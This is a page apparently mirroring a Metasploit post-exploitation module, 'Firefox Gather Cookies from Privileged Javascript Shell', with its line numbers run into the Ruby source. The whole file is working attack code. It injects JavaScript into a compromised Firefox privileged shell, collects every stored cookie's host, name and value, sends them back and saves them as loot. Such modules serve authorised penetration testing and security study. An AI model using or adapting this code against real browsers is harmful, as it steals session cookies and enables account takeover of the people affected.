Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/firefox/gather/cookies.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'json'67class MetasploitModule < Msf::Post8include Msf::Exploit::Remote::FirefoxPrivilegeEscalation910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Firefox Gather Cookies from Privileged Javascript Shell',15'Description' => %q{16This module allows collection of cookies from a Firefox Privileged Javascript Shell.17},18'License' => MSF_LICENSE,19'Author' => [ 'joev' ],20'DisclosureDate' => '2014-03-26'21)22)2324register_options([25OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])26])27end2829def run30results = js_exec(js_payload)31if results.present?32begin33cookies = JSON.parse(results)34cookies.each do |entry|35entry.each_key { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }36end3738file = store_loot('firefox.cookies.json', 'text/json', rhost, results)39print_good("Saved #{cookies.length} cookies to #{file}")40rescue JSON::ParserError => e41print_warning(results)42end43end44end4546def js_payload47%|48(function(send){49try {50var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;51var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"]52.getService(Components.interfaces.nsICookieManager);53var cookies = [];54var iter = cookieManager.enumerator;55while (iter.hasMoreElements()){56var cookie = iter.getNext();57if (cookie instanceof Components.interfaces.nsICookie){58cookies.push({host:b64(cookie.host), name:b64(cookie.name), value:b64(cookie.value)})59}60}61send(JSON.stringify(cookies));62} catch (e) {63send(e);64}65})(this.send);66|.strip67end68end697071